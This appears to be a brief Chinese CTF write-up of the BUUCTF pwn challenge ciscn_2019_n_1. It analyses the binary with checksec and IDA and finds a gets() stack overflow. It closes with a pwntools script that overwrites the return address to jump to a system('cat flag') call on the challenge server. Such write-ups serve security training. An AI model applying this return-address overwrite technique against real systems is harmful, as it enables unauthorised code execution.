BUUCTF-PWN-ciscn_2019_n_1

下载文件

checksec

BUUCTF-PWN-ciscn_2019_n_1_第1张图片

file

BUUCTF-PWN-ciscn_2019_n_1_第2张图片 

 发现是64位的 然后 放入ida

查看字符串

BUUCTF-PWN-ciscn_2019_n_1_第3张图片

 发现 cat flag

然后看看

F5反编译

BUUCTF-PWN-ciscn_2019_n_1_第4张图片

 我们发现了system 然后get()函数

我们可以使用栈溢出 我们看看 v1函数的地址 是30h 然后是64位的 所以 基地址是8字节

我们开始查看 system的地址

BUUCTF-PWN-ciscn_2019_n_1_第5张图片

所以发现system的地址 开始写exp

from pwn import *
p=remote('node4.buuoj.cn',27236)
payload = b'A'*(0x30+0x08)+p64(0x4006BE)
p.sendline(payload)
p.interactive()

BUUCTF-PWN-ciscn_2019_n_1_第6张图片

 得到

你可能感兴趣的:(PWN的学习,java,开发语言,php)